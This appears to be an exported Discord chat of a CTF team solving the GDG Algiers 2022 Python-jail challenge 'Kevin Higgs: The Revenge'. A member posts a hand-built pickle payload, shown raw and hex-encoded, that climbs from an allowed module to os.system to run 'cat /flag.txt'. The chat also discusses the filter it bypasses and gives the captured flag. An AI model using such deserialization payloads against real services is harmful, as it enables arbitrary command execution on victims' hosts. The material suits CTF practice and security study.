Project Sekai
🔒 GDG Algiers CTF 2022 / ✅-jail-kevin-higgs-the-revenge
Kevin Higgs: The Revenge - 500 points
Category: Jail
Description:
> Putting a number of twists to the original challenge from Angstrom CTF 2022 by Aplet123!
> Can you get out of this pickle?
Author: chenx3n
Files:
Tags: python, jail
Sutx pinned a message to this channel. 10/07/2022 11:00 AM
crazyman ai 10/07/2022 5:50 PM
anyone worked on it?
Avatar
not yet
crazyman ai 10/07/2022 5:50 PM
XD
Avatar
@crazyman ai wants to collaborate 🤝
Avatar
@Violin wants to collaborate 🤝
crazyman ai 10/07/2022 7:25 PM
hey @Violin
19:25
>>> lepickle = b'''\x80\x04cempty
... empty
... }V__name__
... cempty
... __class__.__base__
... sbcempty
... empty
... }V__name__
... cempty
... __name__.__subclasses__
... (tRsbcempty
... empty
... }V__name__
... cempty
... __name__.__getitem__
... (I138
... tRsbcempty
... empty
... }V__name__
... cempty
... __name__.__init__
... sbcempty
... empty
... }V__name__
... cempty
... __name__.__globals__
... sbcempty
... empty
... }V__name__
... cempty
... __name__.get
... (Vsystem
... tRsbcempty
... __name__
... (Vcat /flag.txt
... tR.'''.hex()
>>> print(lepickle)
800463656d7074790a656d7074790a7d565f5f6e616d655f5f0a63656d7074790a5f5f636c6173735f5f2e5f5f626173655f5f0a736263656d7074790a656d7074790a7d565f5f6e616d655f5f0a63656d7074790a5f5f6e616d655f5f2e5f5f737562636c61737365735f5f0a287452736263656d7074790a656d7074790a7d565f5f6e616d655f5f0a63656d7074790a5f5f6e616d655f5f2e5f5f6765746974656d5f5f0a28493133380a7452736263656d7074790a656d7074790a7d565f5f6e616d655f5f0a63656d7074790a5f5f6e616d655f5f2e5f5f696e69745f5f0a736263656d7074790a656d7074790a7d565f5f6e616d655f5f0a63656d7074790a5f5f6e616d655f5f2e5f5f676c6f62616c735f5f0a736263656d7074790a656d7074790a7d565f5f6e616d655f5f0a63656d7074790a5f5f6e616d655f5f2e6765740a285673797374656d0a7452736263656d7074790a5f5f6e616d655f5f0a2856636174202f666c61672e7478740a74522e
19:26
it's now my payload
Avatar
oh hey
crazyman ai 10/07/2022 7:26 PM
But I don't know what has been banned XD
Avatar
this was the old one
crazyman ai 10/07/2022 7:28 PM
yeah
19:29
it's my payload of old one
19:29
and it can bypass if module == "empty" and name.count(".") <= 1 and "setattr" not in name and "setitem" not in name:
Avatar
(Vcat /flag.txt does not work, can you try (Vopen /flag.txt ?
19:32
and read it?
crazyman ai 10/07/2022 7:41 PM
yeah
Avatar
CyberErudites{wOw_L3T$_CR0wn_THe_nEw_pIcKle_Ch4MP1On}
crazyman ai 10/07/2022 7:41 PM
cool
crazyman ai 10/07/2022 7:42 PM
what payload did u work?
Avatar
Violin
used /ctf solve
✅ Challenge solved.
crazyman ai 10/07/2022 7:43 PM
😂
19:44
so setattr can't ban setattr >
crazyman ai 10/07/2022 7:47 PM
but it seems it did not work for me
19:47
XD
19:48
@Violin u challenge setattr?